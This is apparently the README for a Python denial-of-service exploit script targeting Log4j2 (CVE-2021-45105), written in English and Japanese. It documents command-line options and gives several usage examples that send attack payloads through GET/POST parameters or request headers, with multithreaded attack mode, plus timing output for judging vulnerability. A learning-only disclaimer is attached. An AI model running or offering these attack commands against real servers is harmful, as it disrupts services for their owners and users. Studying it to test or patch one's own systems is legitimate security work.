
log4j2 dos エクスプロイト,CVE-2021-45105 エクスプロイト,サービス拒否 poc
author: 我超怕的
blog: https://www.cnblogs.com/iAmSoScArEd/
github: https://github.com/iAmSOScArEd/
date: 2021-12-20
log4j2 dos exploit
log4j2 dos 脆弱性悪用スクリプト
CVE-2021-45105 Exploit
CVE-2021-45105 悪用スクリプト
Log4j2_dos.py -u <url> -m <method> -d <params> -H <header> -l <loop> -t <thread>
-u,--url attack target
-m,--method http method, only get and post. default is get.
-d,--data get or post params, json format like:{\"username\":\"\"}
-H,--header request header, json format like:{\"user-agent\":\"\"}
-l,--loop payload loop times (or length),default 100.it is determine where is the params, example get param max length or post param max length or request header max length
-t,--thread attack thread. default is 0, just request once.
usage:
Log4j2_dos.py -u http://url.com/ -d {\"username\":\"\"}
Log4j2_dos.py -u http://url.com/ -d {\"username\":\"\"} -l 500 -t 100
Log4j2_dos.py -u http://url.com/ -m post -d {\"username\":\"\"} -l 500
Log4j2_dos.py -u http://url.com/ -m post -H {\"user-agent\":\"\"} -l 500 -t 100
Log4j2_dos.py -u http://url.com/ -m post -d {\"username\":\"\"} -H {\"user-agent\":\"\"} -l 500
-l (--loop) 値は状況に応じて別々に設定する必要があり、大きければ良いというものではありません。Webサーバが受け入れ可能な長さを超えると、攻撃検出に失敗し、攻撃効果が得られない可能性があります。
出力形式:
[+] normal time:0.11111
[+] attack time:2.00000
attack time - normal time > 1 などの場合、脆弱性が存在する可能性があります。-t パラメータを使用して攻撃スレッドを設定できます。
Log4j2_dos.py -u <url> -m <method> -d <params> -H <header> -l <loop> -t <thread>
-u,--url 攻撃目標
-m,--method デフォルトはget、httpメソッド、getとpostのみサポート
-d,--data getまたはpostリクエストパラメータ、json形式、例:{\"username\":\"\"}
-H,--header リクエストヘッダー, json形式, 例:{\"user-agent\":\"\"}
-l,--loop デフォルトは100、ペイロードループ長、パラメータの位置に応じて異なる値を設定。例:リクエストヘッダーの最大許容長、getの最大長、postの最大長
-t,--thread デフォルトは0、1回のみリクエスト。攻撃スレッド。
一般的な使用法:
# デフォルトget、100ペイロードループ、攻撃検出1回、usernameパラメータに攻撃ペイロードを追加
Log4j2_dos.py -u http://url.com/ -d {\"username\":\"\"}
# デフォルトget、500ペイロードループ設定、100攻撃スレッド起動、usernameパラメータに攻撃ペイロードを追加
Log4j2_dos.py -u http://url.com/ -d {\"username\":\"\"} -l 500 -t 100
# POST指定、500ペイロードループ設定、攻撃検出1回、usernameパラメータに攻撃ペイロードを追加
Log4j2_dos.py -u http://url.com/ -m post -d {\"username\":\"\"} -l 500
# POST指定、500ペイロードループ設定、100攻撃スレッド起動、user-agentリクエストヘッダーに攻撃ペイロードを追加
Log4j2_dos.py -u http://url.com/ -m post -H {\"user-agent\":\"\"} -l 500 -t 100
# POST指定、500ペイロードループ設定、攻撃検出1回、usernameパラメータとuser-agentリクエストヘッダーに攻撃ペイロードを追加
Log4j2_dos.py -u http://url.com/ -m post -d {\"username\":\"\"} -H {\"user-agent\":\"\"} -l 500
-l(--loop) 値は状況に応じて別々に設定する必要があり、大きければ良いというものではありません。Webサーバが受け入れ可能な長さを超えると、攻撃検出に失敗し、攻撃効果が得られない可能性があります。
出力形式:
[+] normal time:0.11111
[+] attack time:2.00000
attack timeの遅延が大きい場合、脆弱性が存在することを示します。-t パラメータを使用して攻撃スレッドを設定できます。
不正な目的で使用しないでください。学習と参考のみを目的としています。 いかなる違法行為も私とは無関係です。
(下手な英語です。翻訳は使っていません。大目に見てください。)
By:我超怕的